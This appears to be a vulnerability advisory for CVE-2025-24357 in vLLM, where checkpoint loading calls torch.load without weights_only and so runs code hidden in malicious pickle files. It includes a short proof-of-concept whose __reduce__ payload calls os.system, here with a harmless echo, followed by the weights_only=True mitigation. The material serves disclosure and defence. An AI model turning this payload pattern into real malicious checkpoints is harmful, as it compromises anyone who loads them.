vLLM is a library for LLM inference and serving. vllm/model_executor/weight_utils.py implements hf_model_weights_iterator to load model checkpoints downloaded from Hugging Face. It uses torch.load, whose weights_only parameter defaults to False; when torch.load unpickles malicious pickle data, it executes arbitrary code during deserialization. This vulnerability is fixed in v0.7.0.
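
The sketch below illustrates the underlying issue, not vLLM's own code: a pickle payload can name an arbitrary callable via `__reduce__`, and torch.load with weights_only=False will invoke it during unpickling. The file name `malicious_checkpoint.pt` and the payload class are hypothetical stand-ins for an attacker-crafted checkpoint.

```python
# Minimal sketch of unsafe pickle deserialization via torch.load (not vLLM code).
import os

import torch


class MaliciousPayload:
    # __reduce__ tells pickle to rebuild this object by calling an arbitrary
    # callable at load time -- here, os.system with a harmless echo command.
    def __reduce__(self):
        return (os.system, ("echo 'arbitrary code executed during unpickling'",))


# Stand-in for an attacker-crafted checkpoint fetched from a model hub.
torch.save({"weights": MaliciousPayload()}, "malicious_checkpoint.pt")

# Vulnerable pattern: with weights_only=False (the default in older torch
# versions), full unpickling runs the payload's callable.
torch.load("malicious_checkpoint.pt", weights_only=False)  # shell command runs

# Mitigation: weights_only=True uses a restricted unpickler that only accepts
# tensors and other allow-listed types, so the payload is rejected.
try:
    torch.load("malicious_checkpoint.pt", weights_only=True)
except Exception as exc:
    print(f"rejected by weights_only=True: {exc}")
```

Passing weights_only=True (or avoiding pickle-based checkpoint formats entirely) is the standard mitigation for loading untrusted model files.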
CVE ID: CVE-2025-24357
CVSS Base Severity: HIGH
CVSS Base Score: 7.5
Vendor: vllm-project
Product: vllm
EPSS Score: 0.05% (estimated probability of exploitation in the wild)
EPSS Percentile: 17.96% (scores higher than or equal to 17.96% of all scored vulnerabilities)
EPSS Date: 2025-02-25 (date the score was calculated)